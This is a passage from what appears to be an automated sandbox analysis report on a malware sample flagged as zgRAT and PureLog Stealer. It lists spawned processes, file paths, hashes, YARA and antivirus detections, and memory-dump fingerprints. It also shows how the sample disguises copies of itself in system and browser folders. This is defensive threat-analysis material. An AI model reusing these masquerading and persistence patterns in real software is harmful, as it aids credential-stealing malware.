                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:38
                                                  Start time:01:37:15
                                                  Start date:01/08/2024
                                                  Path:C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                                                  Imagebase:0x410000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 68%, ReversingLabs
                                                  • Detection: 55%, Virustotal
                                                  Has exited:true

                                                  Target ID:39
                                                  Start time:01:37:15
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff7e82c0000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:40
                                                  Start time:01:37:15
                                                  Start date:01/08/2024
                                                  Path:C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                                                  Imagebase:0x50000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:41
                                                  Start time:01:37:15
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                                                  Imagebase:0x170000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 68%, ReversingLabs
                                                  • Detection: 55%, Virustotal
                                                  Has exited:true

                                                  Target ID:42
                                                  Start time:01:37:16
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                                                  Imagebase:0x550000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:43
                                                  Start time:01:37:16
                                                  Start date:01/08/2024
                                                  Path:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  Imagebase:0x10000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:44
                                                  Start time:01:37:16
                                                  Start date:01/08/2024
                                                  Path:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  Imagebase:0xef0000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:45
                                                  Start time:01:37:16
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\w32tm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  Imagebase:0x7ff7586d0000
                                                  File size:108'032 bytes
                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:46
                                                  Start time:01:37:20
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                  Imagebase:0x7ff693ab0000
                                                  File size:496'640 bytes
                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:47
                                                  Start time:01:37:22
                                                  Start date:01/08/2024
                                                  Path:C:\Recovery\dllhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Recovery\dllhost.exe"
                                                  Imagebase:0xd50000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:51
                                                  Start time:01:37:26
                                                  Start date:01/08/2024
                                                  Path:C:\Recovery\dllhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Recovery\dllhost.exe"
                                                  Imagebase:0x980000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:52
                                                  Start time:01:37:36
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe"
                                                  Imagebase:0x850000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:53
                                                  Start time:01:37:45
                                                  Start date:01/08/2024
                                                  Path:C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                                                  Imagebase:0x4c0000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:54
                                                  Start time:01:37:53
                                                  Start date:01/08/2024
                                                  Path:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\UuIspZT5b6.exe"
                                                  Imagebase:0xa50000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:55
                                                  Start time:01:38:01
                                                  Start date:01/08/2024
                                                  Path:C:\Recovery\dllhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Recovery\dllhost.exe"
                                                  Imagebase:0x8b0000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true


                                                    Execution Graph

                                                    Execution Coverage:11.4%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:3
                                                    Total number of Limit Nodes:0
                                                    execution_graph 9102 7ffd9bc70aa1 9103 7ffd9bc70abf QueryFullProcessImageNameA 9102->9103 9105 7ffd9bc70c64 9103->9105
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f1fa6ce84ab4be89259605ea4d4ecba3056871008b354668b459c54ef0fc57a
                                                    • Instruction ID: a97539965c8b674f71ae4656928e0680e3a820f26cc3c03f7568202884007c6f
                                                    • Opcode Fuzzy Hash: 7f1fa6ce84ab4be89259605ea4d4ecba3056871008b354668b459c54ef0fc57a
                                                    • Instruction Fuzzy Hash: EE823A30B0D90D8FEB68EB58886967877D1FF98311F1506B9D45EC73A2DE28AD428781

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1893446128.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bc60000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 393e45906abe912c40c201d5fce73e4aefd740e91245cd9eefeeff007480ff63
                                                    • Instruction ID: bba0494a7c094db9a86b0025fc8b01f88dff3bfbf5972c58d6a84ae898d24d17
                                                    • Opcode Fuzzy Hash: 393e45906abe912c40c201d5fce73e4aefd740e91245cd9eefeeff007480ff63
                                                    • Instruction Fuzzy Hash: 29429F30A1960ACFEB6DDF68D4E4AB877A1FF54300F5041BDD45ED729ADA38A981CB40

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1893446128.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bc60000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 540dd54f1e9b59e91d2378a2e51edb065e6aba8914cd6f79ccb15e2a01c1f4ae
                                                    • Instruction ID: 4ccb1d6010dd85e1b15faa0bbb7ee1fa43ff10d11b639ec3157983345508575e
                                                    • Opcode Fuzzy Hash: 540dd54f1e9b59e91d2378a2e51edb065e6aba8914cd6f79ccb15e2a01c1f4ae
                                                    • Instruction Fuzzy Hash: 2F028471B1995F8FEBA8F7A884B9ABC77D1FFA8310F15017AE00DC31A6DD2869418741

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1893446128.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bc60000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID: FullImageNameProcessQuery
                                                    • String ID:
                                                    • API String ID: 3578328331-0
                                                    • Opcode ID: e691f29cced01871e4ce2cc7b82c076e95ba58e336e8ab39b5a62480fa023f3a
                                                    • Instruction ID: 5114e7a4ef6320282e09c5e5aeb73adc32984306eef47896cacaf302a64d99d5
                                                    • Opcode Fuzzy Hash: e691f29cced01871e4ce2cc7b82c076e95ba58e336e8ab39b5a62480fa023f3a
                                                    • Instruction Fuzzy Hash: 8081A270608A8C8FDB69DF68C8967F937E1FF58311F14427EE84EC7292CA7499458B81
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00fca603f3fb2148fe7b93f1c6736220236e0d2c11b647390b98295339dcbda0
                                                    • Instruction ID: 551839c90e453559f3579b80c777a3c1b08797269cf072de5c7e795eeb843971
                                                    • Opcode Fuzzy Hash: 00fca603f3fb2148fe7b93f1c6736220236e0d2c11b647390b98295339dcbda0
                                                    • Instruction Fuzzy Hash: A2018F21B1A50E8BEF68EBE8C4A46B82792EF98351F024175D40ED32F6DD29AA418740
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61d6c34c27d2901b32150c26286465d556a8a6f847c373a013a64c7c5a4f5fad
                                                    • Instruction ID: b6240e9690ef3028b9ffe91f849d668afec13e87a95ae2d3c21249b547c8fee2
                                                    • Opcode Fuzzy Hash: 61d6c34c27d2901b32150c26286465d556a8a6f847c373a013a64c7c5a4f5fad
                                                    • Instruction Fuzzy Hash: 2B018C35A1E28D8FEB16DBB488641987FB0EF46714F1641F7D054DB2A6D9386B48C780
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c3b23bbc7b9ae0e315be927441fc649263978d011d2bc4341b381c15b388a197
                                                    • Instruction ID: 2281012130666b0c53fab0de0c26fe271cc7e2cc4b92c407ed23dd23a8137760
                                                    • Opcode Fuzzy Hash: c3b23bbc7b9ae0e315be927441fc649263978d011d2bc4341b381c15b388a197
                                                    • Instruction Fuzzy Hash: 3D012C3590CA59CFCB55EB18C895A9977F1FB6C310F45069AD409D72A1DB34AE41CF80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3911e99600fe100b0a4a7bc0bb547a85a0d20718d05ad519cb46b6244697557a
                                                    • Instruction ID: d36249f8b8b8cfcbd95815f1244933d8a273a63c587a6b87793ec0b606a5f5c0
                                                    • Opcode Fuzzy Hash: 3911e99600fe100b0a4a7bc0bb547a85a0d20718d05ad519cb46b6244697557a
                                                    • Instruction Fuzzy Hash: 33015A34A1E2898FEB16DBA488A41987FB0EF16704F1641E7D454DB2A6D9386B448741
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 681dd678f55423f80fde8d03723e4bba8c8974644ff91c345b29d095a9e77cad
                                                    • Instruction ID: 46210ba721b55378ddd7f3797381cbcb531c8190a2683e15068ceb93a91e0b4c
                                                    • Opcode Fuzzy Hash: 681dd678f55423f80fde8d03723e4bba8c8974644ff91c345b29d095a9e77cad
                                                    • Instruction Fuzzy Hash: E2F03130B1A50E8BEF79EB94C8A47F87761EB58311F1141B9C40EA22A1DE386A84CB40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 66cf35f82717fc1cc5148c50076544c64e91237c2f0b7f92879392836b411a13
                                                    • Instruction ID: 206be18c23f38dd525a492dab24fa65cb5314288f6118ac102f33633d90ccd54
                                                    • Opcode Fuzzy Hash: 66cf35f82717fc1cc5148c50076544c64e91237c2f0b7f92879392836b411a13
                                                    • Instruction Fuzzy Hash: 23F0E53525E689CFD741A738C8A16D4BFA0EF03209F4A11EAC489C7963D214585DCB41
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8cd932901108484ecbd1028138cfcf107a4298210c603351e4cb55657a5c86bf
                                                    • Instruction ID: ec5ad483bb3efd2e72b375a089abd2d58b36189eb7ab0fa2f9a96cd09fbe77f8
                                                    • Opcode Fuzzy Hash: 8cd932901108484ecbd1028138cfcf107a4298210c603351e4cb55657a5c86bf
                                                    • Instruction Fuzzy Hash: 3AF05E30B1A50E8BEFB8DBD4C8A47B83751EF58311F014275D44DA72F2CD29AF858A40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 11d47517605fa365616f1bc5108bf7340daef58e1c6120019b67247a5ac9dd3f
                                                    • Instruction ID: 9f6aacdc4b264e02c7040e5d4e17a3e8f7e84f57516213c08f7f68546743d208
                                                    • Opcode Fuzzy Hash: 11d47517605fa365616f1bc5108bf7340daef58e1c6120019b67247a5ac9dd3f
                                                    • Instruction Fuzzy Hash: 4BE01212F5D54D46FBBCA3A858363B854C2EF9C704F4A41B9A05DC32D3DC482D800393
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e9c3a768ca4a15c833beaef444c98401a766ec53a568349f7243ec7c344a2d83
                                                    • Instruction ID: ad2f4052b067b61a18b6528d92cd979851e1deb705113a0321c9aa4fc3d8a01e
                                                    • Opcode Fuzzy Hash: e9c3a768ca4a15c833beaef444c98401a766ec53a568349f7243ec7c344a2d83
                                                    • Instruction Fuzzy Hash: F1C04C06F6B61F41FC3673EE98660ACA9406FDDF10FD70172D64D500E1AD4D22D54156
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 357baf54a18fbec0c068af6c39e917b84b8ac1f83436bfccbdac3267fcba0015
                                                    • Instruction ID: f5afea7c36a37803931b794cf177333dd33fbab8ee6d41c43c70345e4a960aca
                                                    • Opcode Fuzzy Hash: 357baf54a18fbec0c068af6c39e917b84b8ac1f83436bfccbdac3267fcba0015
                                                    • Instruction Fuzzy Hash: B2C08C3461180C8FC908EB28C88480437A0FB0D200BC20090E009C7170E229DCC1C740
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: de2915e4b3f3d02ad5128240c18b2f79ae5fc8f7bd4b9e18c8a072f88f83e8ba
                                                    • Instruction ID: 7c179d6ff6f1e71a7a6a56a87be7cf0c386b8194659aea7c98e8eb4748656b83
                                                    • Opcode Fuzzy Hash: de2915e4b3f3d02ad5128240c18b2f79ae5fc8f7bd4b9e18c8a072f88f83e8ba
                                                    • Instruction Fuzzy Hash: 87C04C40F1D81A16F75AB75898316BE48539B84744FD504B5E42E972CECE9C994202D7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ae72c574db76d6c85465251d491aaf8998b500b8fcddd359cf8eba7dae60f7b
                                                    • Instruction ID: 72f6aa97fb536398eea38e94ab17466f98f739a3eecab6c46c8b1349559f7bc5
                                                    • Opcode Fuzzy Hash: 7ae72c574db76d6c85465251d491aaf8998b500b8fcddd359cf8eba7dae60f7b
                                                    • Instruction Fuzzy Hash: F5B01200D6740F01EC2433FA08620A478406B4C600FC60070D80D50091A84D12940242
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1893446128.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bc60000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e36abf0f59aeba5f868410bc8cea51eeb02b858631aca75e3835dada30b5779
                                                    • Instruction ID: a48ddb4e3d613ded0b57cc24cf59bcb29a5e019e873b055d76a3f26c5995c770
                                                    • Opcode Fuzzy Hash: 6e36abf0f59aeba5f868410bc8cea51eeb02b858631aca75e3835dada30b5779
                                                    • Instruction Fuzzy Hash: 8A513F30A1951DCFDB58EBA4C869ABD77B1FF58304F610579E01AD72A9CF35A842CB40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: e04915cc82d030085f3452353eb915b34d207cd6d2f43e59546fef3118dd530a
                                                    • Instruction ID: 8f7ace8b044e1fd3fa902ae7a00ee120a14cf4ab20fe5cd60dd930381f958173
                                                    • Opcode Fuzzy Hash: e04915cc82d030085f3452353eb915b34d207cd6d2f43e59546fef3118dd530a
                                                    • Instruction Fuzzy Hash: 1841CF87B1953685E31F33FC792A9ED5B84CF8527DB0842B7E16E8A0C75C88608393E5
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 980b928141c660dbb6dab3bde4a0bef340553ed055385dcab7e1da71f4895c31
                                                    • Instruction ID: 23faecffda9e0ff94e416c8c4e54ee481fc9aa88fb66fdec3d4f5136ba0a98d8
                                                    • Opcode Fuzzy Hash: 980b928141c660dbb6dab3bde4a0bef340553ed055385dcab7e1da71f4895c31
                                                    • Instruction Fuzzy Hash: 6BB1F161A6F69E0AE32D67580C930B07791EF86B45B1A83BEC9DBC7097DD18750382C2
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cd92ff81fefe6ef2211835e8a9e64d39c12e36a44bec4c44897ea20151e1580d
                                                    • Instruction ID: 8568a05c46cd0a427d67f96c425482404fdc0e2a2459655f053b0625d802c7fd
                                                    • Opcode Fuzzy Hash: cd92ff81fefe6ef2211835e8a9e64d39c12e36a44bec4c44897ea20151e1580d
                                                    • Instruction Fuzzy Hash: C5913275A18A9D8FEB89DB688C697B9BFE1FF99300F4041BAD149C72D2EB781414C341
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M
                                                    • API String ID: 0-3664761504
                                                    • Opcode ID: 46efbf11690b83a8fa3a1f7afd35ea82b8c5f5257f751bb3bf3b14fec629ee7b
                                                    • Instruction ID: 9c1c9efa9a1d879a35c59a617fd63250d1d0f7c5081eec22b5eab92a9e13bd36
                                                    • Opcode Fuzzy Hash: 46efbf11690b83a8fa3a1f7afd35ea82b8c5f5257f751bb3bf3b14fec629ee7b
                                                    • Instruction Fuzzy Hash: BFF0306164F3D54FCB169A748868855BF60AE6720174A52EEC046CF2A3EA199886C741
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M
                                                    • API String ID: 0-3664761504
                                                    • Opcode ID: 2a3c804da30aa7012f7911daf81a40d09a04422539034b65641b851e39802886
                                                    • Instruction ID: 8decbac5f41816ad35e8318589b22022548396668362d9245322756e02a4f705
                                                    • Opcode Fuzzy Hash: 2a3c804da30aa7012f7911daf81a40d09a04422539034b65641b851e39802886
                                                    • Instruction Fuzzy Hash: 3CF0306164F3D44FCB169A7488648557F60AE6721174A52EFC045CF1E3EA1DD886C741
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: I
                                                    • API String ID: 0-3707901625
                                                    • Opcode ID: 129eb3d3ff204ca6500df296fdfa8af55b01df7b164495c77df5a88c6f1417a3
                                                    • Instruction ID: d74a9d4e0ef9954ea30dfcbdabaa96045ea708ebcff79d82c888d7e00ccd9317
                                                    • Opcode Fuzzy Hash: 129eb3d3ff204ca6500df296fdfa8af55b01df7b164495c77df5a88c6f1417a3
                                                    • Instruction Fuzzy Hash: A7E0ED6154F3D44FCB1A9B748869C553F70AE6721074B41DEC185CF5B3E6299949C701
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: I
                                                    • API String ID: 0-3707901625
                                                    • Opcode ID: 2c2eb82684aa9f6d5ea08ea8de07b566c523520a3325251f70b3d793d86ab811
                                                    • Instruction ID: ad0a08ba5f9e8f75bb64d1cae9f7b79f31db6bfb264ffdbe6ef147426394d88d
                                                    • Opcode Fuzzy Hash: 2c2eb82684aa9f6d5ea08ea8de07b566c523520a3325251f70b3d793d86ab811
